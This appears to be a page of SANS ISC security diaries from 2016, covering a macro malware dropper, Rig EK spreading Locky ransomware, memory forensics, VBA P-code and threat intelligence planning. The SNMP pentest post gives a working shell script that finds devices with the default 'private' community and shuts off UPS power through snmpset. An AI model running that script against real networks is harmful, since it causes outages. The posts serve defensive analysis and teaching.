Diaries

Published: 2016-09-30

Another Day, Another Malicious Behaviour

Every day, we are spammed with thousands of malicious emails and attackers always try to find new ways to bypass the security controls. Yesterday, I detected a suspicious HTTP GET request:

GET /ork/install.zip?fid=484703180 HTTP/1.1
User-Agent: http://offensivereports.xyz/ork/install.zip?fid=48473180
Host: offensivereports.xyz

Just by reading the User-Agent string, you already know that this is something weird and it must be investigated. I downloaded the file which was indeed a ZIP archive and not a disguised PE file. But this time, the archive is protected with a password! The file MD5 is 55d620a29afc46de0a5cb2bebfd7968b and is reported as non-malicious by VT (normal: the files can't be extracted):

$ unzip -l install.zip
Archive:  install.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
   439608  09-14-15 12:44   msvcp140.dll
   348160  04-28-16 09:15   msvcr71.dll
   676036  04-28-16 09:15   sqlite3.7.11.dll
   196608  04-28-16 09:15   ssleay32.dll
   488467  09-25-16 10:17   upd.exe
    88248  06-23-15 15:00   vcruntime140.dll
       57  09-22-16 22:19   x.Cmd
   466432  09-16-16 08:10   em.exe
   418304  09-16-16 08:31   fb.exe
   439808  09-26-16 12:27   ie.exe
  1011712  04-28-16 09:15   libeay32.dll
  2533907  09-26-16 13:55   msupd.exe
 --------                   -------
  7107347                   12 files

More checks in my log files revealed that the HTTP GET originated from a malicious Word document (MD5: 9f2264c60115cc6d1dd69a4348a26fb2 - unknown on VirusTotal). Let's have a deeper look at the file and the macros. It starts with a classic scenario, the user is enticed to enable macros to view the document. Note the look of the message which mimics a missing plug-in!

The document contains hidden data (a white font on a white background) which looks like Base64/XOR’d data:

The macro was pretty well obfuscated to evade the classic antivirus solution but a quick manual analysis of the macro revealed that the hidden data are extracted and the decrypted data are dumped in a file in a random directory with a random filename (3 letters for the directory and 2 letters for the filename): %LOCALAPPDATA%\Temp\xxx\xx.cmd.

Here are some other indicators extracted by olevba.py:

+------------+---------------+-----------------------------------------+
| Type       | Keyword       | Description                             |
+------------+---------------+-----------------------------------------+
| AutoExec   | AutoOpen      | Runs when the Word document is opened   |
| AutoExec   | Workbook_Open | Runs when the Excel Workbook is opened  |
| Suspicious | Open          | May open a file                         |
| Suspicious | Shell         | May run an executable file or a system  |
|            |               | command                                 |
| Suspicious | MkDir         | May create a directory                  |
| Suspicious | Binary        | May read or write a binary file (if     |
|            |               | combined with Open)                     |
| Suspicious | CreateObject  | May create an OLE object                |
| Suspicious | Chr           | May attempt to obfuscate specific       |
|            |               | strings                                 |
| Suspicious | Xor           | May attempt to obfuscate specific       |
|            |               | strings                                 |
| Suspicious | Environ       | May read system environment variables   |
| Suspicious | Put           | May write to a file (if combined with   |
|            |               | Open)                                   |
+------------+---------------+-----------------------------------------+

The created file 'xx.cmd' is a PE file (MD5: 9b8af9042b8f357e17e6609aa5d0dc7d) also unknown on VT. The file is executed by the macro using a Shell() command. It performs the following actions:

  • It downloads the ZIP file mentioned above
  • It extracts the content on the file system in %PROGRAMDATA%
  • It executes 'msupd.exe' (extracted from the archive - see the content above)

The next step was to get the files from the ZIP archive. The .cmd PE file was not obfuscated and contained a lot of strings. I created a dictionary based on those strings and started a dictionary attack against the archive, no success. Let's try a brute-force attack with a password estimated between 3-8 characters and I was lucky: The password was found in a few seconds (a weak 3-characters password). Here are the MD5 hashes of the extracted files:

$ md5sum *
MD5 (em.exe) = bae5851b1ea539b16800f5bdaded3a68
MD5 (fb.exe) = 38ff837f504f63e04491682e96447cdb
MD5 (ie.exe) = a8107e664bfbee36653bcdcff37afa00
MD5 (libeay32.dll) = 177bda0c92482dfa2c162a3750932b9c
MD5 (msupd.exe) = 8e402be9c03d288a5aee9565143632bc
MD5 (msvcp140.dll) = 1d8c79f293ca86e8857149fb4efe4452
MD5 (msvcr71.dll) = 86f1895ae8c5e8b17d99ece768a70732
MD5 (sqlite3.7.11.dll) = f45ed79fee632e407831fbebc51fc063
MD5 (ssleay32.dll) = 5023f4c4aaaa1b6e9d992d6bbdcd340b
MD5 (upd.exe) = 6c66d7c6a3718d515370709a9f06f4a6
MD5 (vcruntime140.dll) = c2bbcb5aae069c22711d8e49d6107401
MD5 (x.Cmd) = f97253ff3c80b94fa2efb9e5ab1808db

Only the file 'em.exe' is reported as malicious by VT[1]. The 'msupd.exe' file as an original name 'setup.exe' and is reported as a Microsoft Setup Bootstrap[2] file:

It enumerates the processes, starts a keylogger, deploys and executes the other PE files (like any Windows installer):

C:\ProgramData\ie.exe" -f "C:\ProgramData\bigchunk\ie.txt
C:\ProgramData\em.exe, -f "C:\ProgramData\bigchunk\em.txt"
C:\ProgramData\fb.exe" -f "C:\ProgramData\bigchunk\fb.txt

Those files are common tools to collect email passwords (em.exe), browsers passwords (ie.exe) and social networks passwords (fb.exe).

But the funny stuff was for sure the notification sent via email to the attacker. Here is a dump of the SMTP session recorded:

220 s37.linuxpl.com ESMTP Server
EHLO SystemIT
250-s37.linuxpl.com Hello xxxxxxxx [x.x.x.x]
250-SIZE 104857600
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
AUTH PLAIN xxxxxxxxxxx
235 Authentication succeeded
AUTH LOGIN
503 already authenticated
MAIL FROM: SIZE=345
250 OK
RCPT TO:
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
From: reports@offensivereports.xyz
To: xxxxxxxx@gmail.com
Date: Thu, 29 Sep 2016 08:20:36 +0100
Subject: Installed 169.254.100.7[SystemIT]
X-mailer: Synapse - Delphi & Kylix TCP/IP library by Lukas Gebauer

Sucessfully installed. Remote remove code: xxxxxxxxxxxxxxxxxxxxxxx Check FAQ to know how remotely uninstall software
.
250 OK id=1bpV6a-0003zu-98
QUIT
221 s37.linuxpl.com closing connection

Now I have the attacker's email address and credentials to use his mail server!

Sadly, the attack was not completely successful in my sandbox environment and no data was ex-filtrated (collected credentials). I did not detect any traffic to the Wild Internet... As you can see, attackers are always trying to find ways to bypass security controls like password protected archives, generic Microsoft tools).

Stay safe!

[1] https://www.virustotal.com/en/file/2e149eae2956d2d749110f803044ff8b252dcbaf3ae09bdcf30a58b74bbd7329/analysis/
[2] https://www.microsoft.com/en-us/download/details.aspx?id=24556

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

8 Comments

Published: 2016-09-28

SNMP Pwn3ge

Sometimes getting access to company assets is very complicated. Sometimes it is much easier (read: too easy) than expected. If one of the goals of a pentester is to get juicy information about the target, preventing the IT infrastructure to run efficiently (deny of service) is also a “win”. Indeed, in some business fields, if the infrastructure is not running, the business is impacted and the company may lose a lot of money. Think about traders.

I was recently involved in a pentest with the goal to test the customer's internal network. The scope was easy: to come on site, connect your laptop to a free network port and see what you can find/do. In such scenario, the breaking point is to successfully be connected to the network. If Mr “DHCP" is kind enough to provide you an IP address, you are "in" and you may consider the network as already compromised. This was the case for me, no protection against rogue devices, no network access control. I launched my Ettercap and started to sniff some packets playing MitM. I immediately grabbed some nice SNMP packets with interesting communities like “public” and “private”. As you probably know, those are the default ones on many systems. “public” provides usually a read-only access and “private” is used in read-write mode. Often, I hear this comment: "But SNMP is just a monitoring protocol, why should I care?”. Wrong! SNMP, as described by RFC 3411[1], means “Simple Network Management Protocol” and not “Monitoring Protocol”. If you have SNMP read access to a device, you can collect interesting information (version, processes, IP information, health) for the reconnaissance phase. But if you have SNMP write access to a device, you can alter his configuration and cause much more damages

During my engagement, the next step was to find devices with SNMP write capabilities:

# nmap -Pn -sU -p 161 -v -oA snmp 192.168.1.0/24
# grep ‘161/open/udp’ snmp.gnmap | awk ‘{ print $2 }’ | while read IP
do
     snmpwalk -v1 -c private $IP >/dev/null 2>&1
     if [ “$?” == “0” ]; then
         echo “$IP accepts private community"
         echo $IP >>vulnerable_ip.tmp
     fi
done 

The next step was to identify the vulnerable devices. This information is discoverable with the OID .1.3.6.1.2.1.1.1.0 (sysDescr). Example:

# snmpwalk -v1 -On -c xxxxxxxxx 192.168.254.4 SNMPv2-MIB::sysDescr.0
.1.3.6.1.2.1.1.1.0 = STRING: Cisco IOS Software, C1600 Software (AP1G2-K9W7-M), Version 15.2(2)JB2, RELEASE SOFTWARE (fc1)

Guess what? Most vulnerable devices were UPS management systems configured with default settings or, more precisely, not configured at all. The next step was to browse the vendor MIB (“Management Information Base”). The vendor ID was 534 and is assigned to Eaton Corporation [2]. The MIB reveals some interesting read/write OID's like this one: 1.3.6.1.4.1.534.1.9.1. This OID is called “xupsControlOutputOffDelay”. Here is the description:

"Setting this value to other than zero will cause the UPS output to turn off after the number of seconds. Setting it to 0 will cause an attempt to abort a pending shutdown."

We are close to perform a nice DoS against the customer's infrastructure. How? A simple 'snmpset' command will help us. Let's wrap it in a nice small script:

for IP in ‘cat vulnerable_ip.tmp'
do
   snmpset -c private -v1 $IP 1.3.6.1.4.1.534.1.9.1 i 10
   echo -n $IP
   d=10
   while [ $d -gt 0 ]; do echo -n ‘.’; d=$((d-1)); sleep 1; done
   echo “Tango down!"
done

Game over! Note that this is a proof of concept. In most pentest engagements, you're not allowed to perform such actions.

It is a pity that such very simple attack is still possible in 2016! If the customer followed the SANS Top-20 controls[3], this attack wouldn't be possible:

  • CSC1 - Inventory of authorized and unauthorized devices
  • CSC4 - Continuous vulnerability scanning, assessment, and remediation
  • CSC9 - Limitation and control of network ports, protocols, and services
  • CSC11 - Secure configuration for network devices such as firewalls, routers, and switches

[1] https://www.ietf.org/rfc/rfc3411.txt
[2] https://www.iana.org/assignments/enterprise-numbers/enterprise-numbers
[3] https://www.sans.org/media/critical-security-controls/critical-controls-poster-2016.pdf

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

4 Comments

Published: 2016-09-28

Rig Exploit Kit from the Afraidgate Campaign

Introduction

Yesterday on Tuesday 2016-09-27, the Afraidgate campaign switched from Neutrino exploit kit (EK) to Rig EK [1].  As we go into Wednesday 2016-09-28, this trend continues.

So let's examine another case of Afraidgate using Rig EK!

Details

The Afraidgate campaign has been sending Locky since it stopped distributing CryptXXX ransomware in mid-July 2016 [2].  Afraidgate started using Neutrino EK after Angler EK disappeared in early June 2016 [3].

Currently, Afraidgate is using Rig EK, and it's distributing the newest variant of Locky ransomware.  This newest variant is called "Odin" because of the .odin file extension Locky is now using for its encrypted files [4].

The image below shows the current chain of events since Afraidgate switched to Rig EK.


Shown above:  Afraidgate campaign chain of events.

Infection traffic


Shown above:  Traffic from today's infection filtered in Wireshark.

Indicators from this traffic are:

  • www.allthingsbritish.net - Compromised site
  • 139.59.171.176 port 80 - story.opiniaonline.ro - Afraidgate redirect
  • 195.133.201.49 port 80 - art.unknownproject.com - Rig EK
  • crocotan.com - failed DNS query from Locky downloader to get Locky
  • 45.32.144.151 port 80 - findidlist.com - Locky downloader grabbing Locky
  • kdbbpmrdfnlno.pl - failed DNS query from the Locky ransomware
  • kgijxdracnyjxh.biz - failed DNS query from the Locky ransomware
  • vgcfwrnfrkkarc.work - failed DNS query from the Locky ransomware
  • ehkhxyvvcpk.biz - failed DNS query from the Locky ransomware
  • rluqypf.pw - failed DNS query from the Locky ransomware
  • wfgtoxqbf.biz - failed DNS query from the Locky ransomware
  • ndyevynuwqe.su - failed DNS query from the Locky ransomware
  • dceaordeoe.ru - failed DNS query from the Locky ransomware
  • jlhxyspgvwcnjb.work - failed DNS query from the Locky ransomware
  • gisydkcsxosyokkuv.work - failed DNS query from the Locky ransomware
  • ufyjlxiscap.info - failed DNS query from the Locky ransomware

In the image below, injected script is highlighted in a page from the compromised site.  This script kicked off the infection chain by generating HTTP traffic to a gate.  Checking the domain registration, we see the gate's name servers are from afraid.org, which is a common characteristic for gates used by this campaign.


Shown above:  Injected script in a page from the compromised website.

Next, the Afraidgate URL returned script with an iframe that pointed to a Rig EK landing page.


Shown above:  The Afraidgate URL redirecting to a Rig EK landing page.

Rig EK has gone through some changes in recent weeks.  Earlier this month, I noticed the landing page for Rig EK included a large amount of non-ASCII characters.  That was also the case today.


Shown above:  An example of a Rig EK landing page.

The Rig EK Flash exploits are now around 25 kB in size.


Shown above:  Rig EK sends a Flash exploit.

The Rig EK payload is now encoded with an encryption algorithm.  Previously, Rig EK used a more straight-forward method of XOR-ing the binary with an ASCII string.  Now the payload is more heavily obfuscated.  In this case, the payload was a downloader for Locky.


Shown above:  Rig EK sends the malware payload.

After Rig EK sent the Locky downloader, that downloader grabbed Locky.  In the traffic, we see a fake user agent and fake content type in the HTTP headers.  The Locky binary was also encoded as it came across the network.


Shown above:  Locky downloader retrieves Locky.

A closer look at the traffic shows findidlist.com wasn't the first domain the infected host tried when downloading the Locky binary.  Crocotan.com was tried first, but that domain has been apparently taken off line.

After Locky was downloaded, the infected host generated several DNS queries for other domains, presumably for the Locky post-infection callback.  None of those DNS queries were successful.


Shown above:  Lots of failed DNS queries.

The infected host

Even though Locky wasn't able to perform its post-infection callback, the victim host was still infected.  File extensions were .odin for the encrypted files, so this is the most recent variant of Locky (the "Odin" variant).


Shown above:  Desktop of the infected host.

Checking the Locky Drecryptor page revealed the ransom instructions.  As we've often seen with Locky from the Afraidgate campaign, the ransom was 1.5 bitcoin, which as of today is approximately 908 US dollars.


Shown above:  The Locky decryptor page from this infection.

Malware info

The following artifacts were recovered from the infected host:

Rig EK payload (Downloader for Locky):

  • SHA256 hash: 624568125153d786e21927182b141cd8fe7fd4e97b7eb8b1933b8663bf3652ad
  • Size: 48,640 bytes
  • Location: C:\Users\[username]\AppData\Local\Temp\radA62C2.tmp.exe
  • Location: C:\Users\[username]\AppData\Roaming\rgV54QW5xRCUNWS.exe

Locky samples pulled from the infected host:

  • SHA256 hash: d4fd2fe61b13c70740ebc900e8d88123683790a43dd500e0f660f92e9fa257dc
  • Size: 181,760 bytes
  • Location: C:\Users\[username]\AppData\Local\Temp\d36y0wsMOkSrfEYreNRih1M0U.exe
  • Location: C:\Users\[username]\AppData\Local\Temp\Q5ABR5opm4BFjnrbzzuUX9nAd.exe

Final words

Locky ransomware continues to be an evolving threat.  Not only do we see it from near-daily waves of malicious spam (malspam), we also see it distributed in a more stealthy manner through EKs.  The Afraidgate campaign is the currently biggest EK-based campaign distributing Locky.

As always, properly-administered Windows hosts are not likely to be infected.  As long as your Windows host is up-to-date and fully patched, your risk is minimal.  If you're running Windows 10, I doubt you have anything to worry about.

But apparently enough out-of-date Windows hosts browse the web, so this campaign is profitable for the criminal group behind it.

Pcap and malware for this diary are located here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

References:

[1] http://www.malware-traffic-analysis.net/2016/09/27/index.html
[2] http://researchcenter.paloaltonetworks.com/2016/07/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/
[3] http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html
[4] https://blog.opendns.com/2016/09/26/odin-lockys-latest-persona/

0 Comments

Published: 2016-09-27

Back in Time Memory Forensics

 

You might get into a case where you have only the disk image without having the memory image. Or even if you have the memory image but you wish If you have something back in time.With hibernation file (hiberfil.sys) ,Page File (page and crash dump that might be possible. And if you are lucky enough you might be able to recover them from volume shadow copy which is enabled by default in most of modern Windows OS  .In forensic point of view Hibernation file is the most useful file type that might have useful information.

“hiberfil.sys is the file used by default by Microsoft Windows to save the machine's state as part of the hibernation process. The operating system also keeps an open file handle to this file, so no user, including the Administrator, can read the file while the system is running.”[1]

If you have a disk image of Windows Vista+ or later you can check if you have a previous copy of hiberfil.sys through Volume Snapshot Volume (Aka Shadow Copy) which might be prior to a malware infection or compromised or it might have some artifacts that was deleted.

If you like to check your image for pervious versions of hiberfil.sys and restore it ,you can use LibVShadow by Joachim Metz[2].

When you recover the desired hiberfil.sys version,while Volatility framework can examine hiberfil.sys ,but that will very slow and it’s better to convert it first to raw memory image. 

vol.py -f hiberfil.sys --profile=Win7SP1x64 imagecopy -O rawimage.img

 

In the above example I used imagecopy plugin to do the conversation , you have to specify the exact windows version with the service pack level . Another option is using hib2bin.exe by Matt Suiche.[3]

Now let’s examine our image

vol.py -f rawimage.img --profile=Win7SP1x64 pslist

 

olatility Foundation Volatility Framework 2.4

Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                         

------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------

0xfffffa800ccca9e0 System                    4      0    112      567 ------      0 2012-03-15 22:34:19 UTC+0000                                

0xfffffa800d2b5b30 smss.exe                228      4      3       35 ------      0 2012-03-15 22:34:19 UTC+0000                                

0xfffffa800e8862f0 csrss.exe               352    344      9      869      0      0 2012-03-15 22:34:44 UTC+0000                                

0xfffffa800cd049f0 csrss.exe               404    396      9       78      1      0 2012-03-15 22:34:49 UTC+0000                                

0xfffffa800e9a8060 wininit.exe             436    344      3       77      0      0 2012-03-15 22:34:49 UTC+0000                                

0xfffffa800e9a7860 winlogon.exe            444    396      4       94      1      0 2012-03-15 22:34:49 UTC+0000                                

0xfffffa800e9df060 services.exe            508    436      9      274      0      0 2012-03-15 22:34:55 UTC+0000                                

0xfffffa800e9e3850 lsass.exe               516    436      8      942      0      0 2012-03-15 22:34:56 UTC+0000                                

0xfffffa800e9ea910 lsm.exe                 524    436     14      311      0      0 2012-03-15 22:34:56 UTC+0000                                

0xfffffa800ea45860 svchost.exe             612    508     11      375      0      0 2012-03-15 22:35:05 UTC+0000                                

0xfffffa800ea779f0 svchost.exe             688    508     11      364      0      0 2012-03-15 22:35:08 UTC+0000                                

0xfffffa800ea94b30 LogonUI.exe             764    444      8      201      1      0 2012-03-15 22:35:09 UTC+0000                                

0xfffffa800eaa8b30 svchost.exe             772    508     22      522      0      0 2012-03-15 22:35:09 UTC+0000                                

0xfffffa800eaceb30 svchost.exe             832    508     21      517      0      0 2012-03-15 22:35:10 UTC+0000                                

0xfffffa800ead2b30 svchost.exe             856    508     45     1402      0      0 2012-03-15 22:35:10 UTC+0000                                

0xfffffa800eb16b30 svchost.exe             972    508     22      395      0      0 2012-03-15 22:35:12 UTC+0000                                 

0xfffffa800eb4d730 svchost.exe             292    508     25      697      0      0 2012-03-15 22:35:14 UTC+0000                                

0xfffffa800eb51b30 spoolsv.exe             924    508     14      337      0      0 2012-03-15 22:35:26 UTC+0000                                

0xfffffa800ebd5820 svchost.exe             360    508     21      332      0      0 2012-03-15 22:35:27 UTC+0000                                

0xfffffa800ec5e650 FireSvc.exe            1168    508     21      349      0      0 2012-03-15 22:35:32 UTC+0000                                

 

And let check the network connections:

vol.py -f rawimage.img --profile=Win7SP1x64 netscan

 

Volatility Foundation Volatility Framework 2.4

Offset(P)          Proto    Local Address                  Foreign Address      State            Pid      Owner          Created

0x3636300          UDPv4    0.0.0.0:0                      *:*                                   3736     Skype.exe      2012-04-06 13:09:31 UTC+0000

0x959f010          TCPv4    10.3.58.6:62978                72.14.204.138:80     FIN_WAIT1        7508     chrome.exe    

0x29933cf0         TCPv4    10.3.58.6:62979                72.14.204.102:80     FIN_WAIT1        7508     chrome.exe    

0x2ac90a50         TCPv4    -:62088                        14.0.33.84:80        CLOSED           7508     chrome.exe    

0x4ce8d610         TCPv4    -:62054                        -:80                 CLOSED           7508     chrome.exe    

0x578b2430         UDPv6    ::1:53608                      *:*                                   2784     svchost.exe    2012-04-06 13:59:31 UTC+0000

0x58b9ecf0         TCPv4    10.3.58.6:445                  10.3.58.7:2034       ESTABLISHED      4        System        

0x5a690290         TCPv4    127.0.0.1:5678                 127.0.0.1:62149      ESTABLISHED      4256     svchost.exe   

0x72b40010         TCPv4    10.3.58.6:62854                74.217.78.140:80     FIN_WAIT1        7508     chrome.exe    

0x7c488410         UDPv4    127.0.0.1:1900                 *:*                                   2784     svchost.exe    2012-03-20 03:53:45 UTC+0000

0x7c4eaec0         UDPv4    127.0.0.1:53609                *:*                                   2784     svchost.exe    2012-04-06 13:59:31 UTC+0000

0x7c5173c0         TCPv4    10.3.58.6:62795                64.12.152.17:80      FIN_WAIT1        7508     chrome.exe    

 

 

Now lets check the autoruns using the autoruns plugins

vol.py -f rawimage.img --profile=Win7SP1x64 autoruns -t autoruns

 

Autoruns =========================================

 

Hive: \??\C:\Users\SRL-Helpdesk\ntuser.dat

    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2012-03-15 21:20:12 UTC+0000)

        Sidebar                        : %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (PIDs: -)

 

Hive: \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT

    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2009-07-14 04:45:47 UTC+0000)

        Sidebar                        : %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (PIDs: -)

    Software\Microsoft\Windows\CurrentVersion\RunOnce (Last modified: 2010-11-10 18:57:47 UTC+0000)

        mctadmin                       : C:\Windows\System32\mctadmin.exe (PIDs: -)

 

Hive: \SystemRoot\System32\Config\SOFTWARE

    Microsoft\Windows\CurrentVersion\Run (Last modified: 2011-09-16 20:57:09 UTC+0000)

        VMware User Process            : "C:\Program Files\VMware\VMware Tools\VMwareUser.exe" (PIDs: 8984, 4916)

        VMware Tools                   : "C:\Program Files\VMware\VMware Tools\VMwareTray.exe" (PIDs: 6744, 1844)

        McAfee Host Intrusion Prevention Tray : "C:\Program Files\McAfee\Host Intrusion Prevention\FireTray.exe" (PIDs: -)

    Wow6432Node\Microsoft\Windows\CurrentVersion\Run (Last modified: 2012-04-05 17:53:13 UTC+0000)

        ShStatEXE                      : "C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE" /STANDALONE (PIDs: -)

        Adobe Reader Speed Launcher    : "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe" (PIDs: -)

        McAfeeUpdaterUI                : "C:\Program Files (x86)\McAfee\Common Framework\udaterui.exe" /StartedFromRunKey (PIDs: -)

        svchost                        : c:\windows\system32\dllhost\svchost.exe (PIDs: 4256)

        Adobe ARM                      : "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" (PIDs: -)

 

Hive: \??\C:\Users\vibranium\ntuser.dat

    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2012-04-05 17:03:53 UTC+0000)

        Sidebar                        : %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (PIDs: -)

    Software\Microsoft\Windows\CurrentVersion\RunOnce (Last modified: 2012-04-05 17:03:53 UTC+0000)

        mctadmin                       : C:\Windows\System32\mctadmin.exe (PIDs: -)

 

Hive: \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT

    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2009-07-14 04:45:48 UTC+0000)

        Sidebar                        : %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (PIDs: -)

    Software\Microsoft\Windows\CurrentVersion\RunOnce (Last modified: 2010-11-10 18:57:47 UTC+0000)

        mctadmin                       : C:\Windows\System32\mctadmin.exe (PIDs: -)

 

Hive: \??\C:\Users\nfury\ntuser.dat

    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2011-08-25 21:51:37 UTC+0000)

        Google Update                  : "C:\Users\nfury\AppData\Local\Google\Update\GoogleUpdate.exe" /c (PIDs: 3968)

        Skype                          : "C:\Program Files (x86)\Skype\Phone\Skype.exe" /nosplash /minimized (PIDs: 3736)

 

 

 

 

[1] http://www.forensicswiki.org/wiki/Hiberfil.sys

[2] https://github.com/libyal/libvshadow

[3] https://comae.typeform.com/to/XIvMa7

4 Comments

Published: 2016-09-26

VBA and P-code

I want to draw your attention to some great work Dr. Bontchev did.

pcodedmp.py is a VBA P-code disassembler. Microsoft Office documents contain VBA macros in several forms. They contain the source code, but also compiled P-code. Dr. Bontchev created a proof-of-concept document that executes P-code and does not contain the corresponding source code. Here is the output from his pcodedmp.py tool for his PoC document:

python pcodedmp.py -d poc2b.doc

Processing file: poc2b.doc
===============================================================================
Module streams:
Macros/VBA/ThisDocument - 1949 bytes
Line #0:
        FuncDefn (Sub / Property Set) func_00000078
Line #1:
        LitStr 0x001D "This could have been a virus!"
        Ld vbInformation
        Ld vbOKOnly
        Add
        LitStr 0x0006 "Virus!"
        ArgsCall MsgBox 0x0003
Line #2:
        LitStr 0x0008 "calc.exe"
        Paren
        ArgsCall Shell 0x0001
Line #3:
        EndSub

 

Dr. Bontchev also coded a plugin for oledump.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

3 Comments

Published: 2016-09-25

Defining Threat Intelligence Requirements

Introduction

Setting up the requirements is the first task to be completed before investing time in researching and collecting any type of intelligence. However, in many conversations on the topic I have been into, requirements are too often confused with "which tool do we need?" and "how many people do we need?” While these parameters are part of the equation, the main goal of setting the requirements is to understand which type of information is of interest for a given organization. This because there are mainly two issues:
The overall amount of information received from different sources (e.g. sharing groups, feeds, etc.) is huge and a big part of it not relevant to your organization;
Even if you would focus only on the amount of information that interests your organization, most of the times such amount of data would still be well over what is the analyst(s) capacity.

Therefore a proper model has to define the requirements and also their priority, in order to be sure that the most relevant and most critical information is processed and not lost in the noise. 
I like to split the types of requirements in three different groups:

  • High Level Requirements
    • As the name suggests, these are general requirements like defining what type of threat actor is of interest, understanding which are the business industries of operation, etc.
  • Functional Requirements
    • These are more practical and technical requirements, based on what type of infrastructure your organization has.
  • Capability/Visibility Requirements
    • This is literally what information the analyst needs to have access to, in order to get the proper internal visibility needed to meet the requirements defined in the previous two categories.

Defining Threat Intelligence Requirements

Following are the three types of requirements explained in (slightly) more details, to give an example of what each one means. This list does not want to be exhaustive, but rather to set up an initial direction that will have to be tailored to your specific organization.

High Level Requirements

  • Countries of Operation
    • This is a very high level one. The granularity of this has to be defined. It could be referring just to the macro regions of operation (quite high level though for big organizations), to each country were major operational branches are, or to each county were the organization has a presence (even with small branches).
      • E.g. if your organization has no presence/business in Asia or country X, you may not be interested in activities targeting specifically that region/country.
      • E.g. actions led by this could be blocking traffic towards countries your organization has no business with (and/or generating an alert).
         
  • Business Industries of Operation
    • The core business of the company (e.g. insurance, bank/finance, manufacturing, energy, etc.) is obviously known and the first to start with.
    • This point also refers to understanding all other secondary (but relevant) industries your company is involved in and/or possesses sensitive information about;
      • E.g. your organization (e.g. core business finance) is also involved in oil plants, with access to blueprints for business reasons. Are there groups after these specific IP/info? Which ones?
         
  • Business Top Critical Assets
    • Assets refers to both type of critical data for the organization (Credit Card and Financial account data, Personal Identifiable Information, Intellectual Property, Confidential business information, Credentials and IT System Information), and Operational Systems for which their availability is business critical.
       
  • What type of Adversary may be targeting your business?
    • E.g. Hacktivist, Organized Crime, Corporate Espionage, Nation-State, etc.
       
  • Who will consume the Intelligence you collect/produce?
    • SOC analysts, CISO, etc., to understand whether you need to collect/produce technical, tactical and/or strategic intelligence.
       

Functional Requirements

  • Physical external/perimetral exposure
    • Servers facing external network: 
      • What services are publicly exposed? What OS version do they run? What DB + version? Etc. (selecting those of major importance first)
    • Which devices are reachable from the outside?
      • E.g. printers with remote maintenance access.
         
  • Physical internal exposure
    • What systems do you use internally (i.e. that have access to the internal network)?
      • Windows / OSX / *nix ? Which version?
      • Mobile?
    • What software/version do you use internally? (IE, Outlook, Flash, etc.). Are there unpatched vulnerabilities to be monitored? Are any of those being exploited in the wild?
    • What type of attachments do you allow? What types of file are allowed to be downloaded from the internal network?
    • Network infrastructure (yes, that famous diagram no one ever has)
       
  • What type of attacks/threats does your organization fear most?
    • DDoS attacks
    • Banking Trojan
    • Drive-by / EK
    • Credentials' Phishing
    • Intellectual Property (IP) exfiltration
    • Etc.
       

Capability/Visibility Requirements

Given that the best intelligence is the one you can gather from your own environment, and higher visibility into your environment will lead you to use information and tools in a more efficient way. Following there are the resources needed to have visibility on the data needed to fulfill those requirements. 

  • Email logs
    • As basic requirements, it is of paramount importance being able to access all email logs containing timestamp, sender, recipient, subject, attachment(s) name, attachment(s) hash value.
    • Being able to access the quarantined attachments, or having an address were to forward malicious emails for automatic processing in a safe environment;
    • Having access to the email header as well would be a great plus.
       
  • Network: Proxylogs, Firewall logs, IDS logs, DNS logs, etc.
     
  • Passive DNS
    • Another must have is a passive DNS: collect all DNS resolutions ever made by any machine within your network;
    • Third-party pDNS: always useful to get a broader view.
       
  • Endpoint visibility
    • Being able to search/collect information and artifacts from endpoints (i.e. memory, registry hives, running processes, etc.)
       
  • External feeds and sources
    • Free/Paid feeds of indicators
    • Hopefully each analyst belongs to one or more trusted sharing communities, which are usually not public. If not, create your network of trusted peers, this is a must have for an analyst.
       
  • Centralized storage and correlation
    • This may be full-fledged Threat Intelligence Platform (TIP) or an Excel spreadsheet
    • Useful as central collection point of the collected intel. 
    • Ideally can be integrated with other internal tools to allow automation
       

Action Plan

The following is a list of actions to take, which is mapped on the above requirements:

  1. Enumerate your environment (functional requirements: internal and external exposure)
  2. Evaluate your most critical assets the business wants you to protect (high level requirements: business top critical asset).
  3. Identify your Adversaries (high level requirements: what type of adversary may target our business)
  4. Prioritize the type of attacks/threats most dangerous for the business (functional requirements: what type of attacks/threats do you fear?)
  5. Identify the main countries and especially business industries of operation (high level requirements: countries and business industries of operation)
  6. Identify who will be the TI consumers (high level requirements: who will consume the TI?)

Once it is clear what you need to protect and what type of information needs to be collected, it is time to move to the "capability/visibility requirements”, keeping in mind what information you need in order to cover all the requirements defined above.

We have already mentioned that the first and best intelligence feeds you can get are from your own internal environment. Specifically, as also mentioned by Scott J. Roberts in his blog [1], starting from the analysis of your past incident can give you immediately a good indication about your requirements. Do those incidents fit into the requirements you have set? If not, refine them. From the past incidents, it will be possible also to check how mature are the capability/visibility requirements. If that incident will happen again, would you be able to either prevent or detect it? The requirements will tell you.
Last but not least, remember that this is an iterative process and all those requirements need to be reviewed and refined periodically, because the threat landscape will change, as well as the organization infrastructure and/or secondary business industries may change as well. How often? This is really tailored to the organization (e.g. 6 or 12 months). 

